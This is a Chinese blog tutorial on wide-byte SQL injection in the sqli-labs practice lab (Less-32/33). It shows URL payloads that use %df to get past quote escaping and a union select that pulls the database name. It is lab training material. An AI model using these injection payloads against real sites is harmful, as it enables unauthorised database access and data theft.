22、宽字节注入

原创

web安全工具库 2022-12-26 18:25:19 博主文章分类：小课堂 ©著作权

文章标签 宽字节注入 sqli-labs sql Less 特殊字符 文章分类 虚拟化云计算

©著作权归作者所有：来自51CTO博客作者web安全工具库的原创作品，请联系作者获取转载授权，否则将追究法律责任

环境sqli-labs

less 32

一、输入特殊字符，都被转义了

http://192.168.1.121/sqli/Less-32/?id=1\

22、宽字节注入_Less

http://192.168.1.121/sqli/Less-32/?id=1’

22、宽字节注入_特殊字符_02

http://192.168.1.121/sqli/Less-32/?id=1’’

22、宽字节注入_sqli-labs_03

二、构造宽字节闭合

http://192.168.1.121/sqli/Less-32/?id=1%df’ --+

理论上%81-%FE均可

22、宽字节注入_Less_04

三、联合查询数据库

http://192.168.1.121/sqli/Less-32/?id=-1%df’ union select 1,database(),3 --+

22、宽字节注入_特殊字符_05

less 33

同上

禁止非法，后果自负

欢迎关注公众号：web安全工具库

22、宽字节注入_sqli-labs_06

上一篇：子域名收集 -- theHarvester

下一篇：子域名收集 -- domained

提问和评论都可以，用心的回复会被更多人看到评论

发布评论

相关文章

官方博客	全部文章	热门标签	班级博客
了解我们	网站地图	意见反馈

鸿蒙开发者社区	51CTO学堂
51CTO	软考资讯

22、宽字节注入

22、宽字节注入

环境sqli-labs

less 32

一、输入特殊字符，都被转义了

​​http://192.168.1.121/sqli/Less-32/?id=1\​​

​​http://192.168.1.121/sqli/Less-32/?id=1’​​

​​http://192.168.1.121/sqli/Less-32/?id=1’’​​

二、构造宽字节闭合

http://192.168.1.121/sqli/Less-32/?id=1%df’ --+

理论上%81-%FE均可

三、联合查询数据库

http://192.168.1.121/sqli/Less-32/?id=-1%df’ union select 1,database(),3 --+

less 33

同上

禁止非法，后果自负

欢迎关注公众号：web安全工具库

51CTO博客

http://192.168.1.121/sqli/Less-32/?id=1\

http://192.168.1.121/sqli/Less-32/?id=1’

http://192.168.1.121/sqli/Less-32/?id=1’’